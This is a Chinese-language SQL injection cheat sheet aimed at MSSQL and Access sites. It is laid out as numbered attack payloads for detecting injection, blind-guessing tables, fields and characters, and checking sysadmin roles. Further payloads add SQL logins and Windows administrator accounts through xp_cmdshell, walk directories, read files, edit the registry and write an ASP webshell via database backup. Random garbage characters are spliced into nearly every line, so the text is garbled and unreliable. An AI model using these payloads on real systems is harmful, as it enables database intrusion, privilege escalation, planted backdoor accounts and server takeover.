1.判断是否有注入;and 1=1 ;and 1=2 )#�b�}qc#`
2.初步判断是否是mssql ;and user>0 F"B�<�R�~�
c���t2�_N
3.注入参数是字符'and [查询条件] and ''=' fd!pM4�"0�
@!L@�UP0��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' !�^Z[���z[
6SW|H"��!!
5.判断数据库系统 7`u�A����
�m�Fg�b_Cd
;and (select count(*) from sysobjects)>0 mssql /ctaAQDUh\
�~,1-�$�#R
;and (select count(*) from msysobjects)>0 access i#@�v_�^�q
=Ft�M;(\�
q_9N+-?{7�
W�L�)_��8!
6.猜数据库 ;and (select Count(*) from [数据库名])>0 PK.h ��E{R
V:,�3OLL*
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &;NNU��T>Q
W[[YOK1�T�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 G�g�}�LC+Y
v�js|!O=oH
9.(1)猜字段的ascii值(access) �QN2*]+/h�
;�H �m-,W�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �K*HVn2O�V
�y�7;XOPm
(2)猜字段的ascii值(mssql) >�n$E�e�J�
}�Yo1�5BN+
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �' F 6au[�
��xdbu|fC
10.测试权限结构(mssql) �\K_!d]I {
�5�Re`D|8�
�Y00i{/a 8
K;ry4/Va�p
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- $E4�O^0%/p
psyH?�&T�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �V�%�{�9o�
�-+�
IX[��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- t;e]L'z@:�
J<5v��s3[9
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- /k3n{�?�$/
O�p$�J"R�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- R�<0!?�`b�
@|��\��s$L
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Me�K\�eZ\
kGBl)0pr`x
;and 1=(select IS_MEMBER('db_owner'));-- =DF@kR[CH"
q�I V`zZc�
!3X%5=#L�4
(PT?h>|�St
11.添加mssql和系统的帐户 /bNVg�K`L5
��k>z-Z�g�
;exec master.dbo.sp_addlogin username;-- i_�ODgc�`H
;exec master.dbo.sp_password null,username,password;-- ! ��4^�L $
M�ed"d�Ho7
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 2h? r!�[��
-)��v�p&�-
;exec master.dbo.xp_cmdshell 'net user username password T=f;n;/>��
z_,]�fd�=o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- G/RheH�
G�
PEQvE�ruZ}
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �TeN1\r�A,
@O�zf}}#��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- [>�]VN)_J5
[2j�(�\vC!
�}HQT@�&=
��$d?�?(��
12.(1)遍历目录 fdH'�z:Xao
[�q��+�39�
;create table dirs(paths varchar(100), id int) p�vwn�z�a1
iN9!?O�v_
;insert dirs exec master.dbo.xp_dirtree 'c:\' 4[EO[�x4�C
�vM3|Ti>a'
;and (select top 1 paths from dirs)>0 9�q@YE_ji�
@XG`D>�%k
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) uxJ�iec�`&
)
ImIPS��L
h}�:5hi Jw
�}Yl�8Q�>t
(2)遍历目录 N4]6LA�6x6
�(lck6�v?h
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 7�u3�b aM
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �0v)mgrl=,
��ghO//�?m
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 kd4*��Z�ab
4�y}�a,��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 _j���<�M�}
_nFv�M'`<�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2uR4�~XjF�
A)a+LW'�=u
KZ/^gR�\�d
"=TTsxyM6P
13.mssql中的存储过程 Oy`\8*Uy__
LUV�J218p
xp_regenumvalues 注册表根键, 子键 Uo)<�_�nG�
UlZ)|Ya�<M
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �5<8>G?Y�
LK}�e�U,m=
xp_regread 根键,子键,键值名 b�020U>)�v
hfa_�M[#Q-
;exec xp_regread MZMv.OeYt,
5:3$VWLa
<
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M�P&�4}D�e
L#MxB|�fcr
xp_regwrite 根键,子键, 值名, 值类型, 值 �5{f/�H]
P
-@�?>nLQb�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 w}�<I\*\`!
>d[vHyA~!D
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 " yl"A4p
S
d#,�V^����
xp_regdeletevalue 根键,子键,值名 s/|'�1�E\F
�2>�$�L>2$
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %pKs- ��n`
F9%�VyQf��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 j~>
#{"��C
-+�Ji~�;b�
�A^7��Zy79
9�
f/tNQ7W
14.mssql的backup创建webshell >�(�J�!8*7
�Zl�Xs7
&_
use model *3o��QS"�8
/ UBAQ8TR
create table cmd(str image); KAEpFob�Yo
�Ykq� �}9�
insert into cmd(str) values (''); 3+�P�M_c)Y
z1A-EeT���
backup database model to disk='c:\l.asp'; �ZI]K+�jza
+@��v} (��
E&�v�-(0��
QNBzc {X�B
15.mssql内置函数 $�
$+z^%'_
(Gs��g+c
�
;and (select @@version)>0 获得Windows的版本号 ������88U�
*Y?]="8c#;
;and user_name()='dbo' 判断当前系统的连接用户是不是sa cn��e[-�E�
: P��2;9+v
;and (select user_name())>0 爆当前系统的连接用户 D4T+Gk"�n�
��^�el:)$
;and (select db_name())>0 得到当前连接的数据库 �KwyXM9h6=
`/iN%ZKu�m
w-/�Tb~�#E
Dn!����V)T
16.简洁的webshell �m8�`�A~�
I�<#kw)W�!
use model 9 �f+7vC�A
ThB2U(�Wf
create table cmd(str image); ]kvE+m&p}^
�3g?T,|�2K
insert into cmd(str) values (''); ?+�_�"2XY�
}=��)"uv�
backup database model to disk='g:\wwwtest\l.asp';
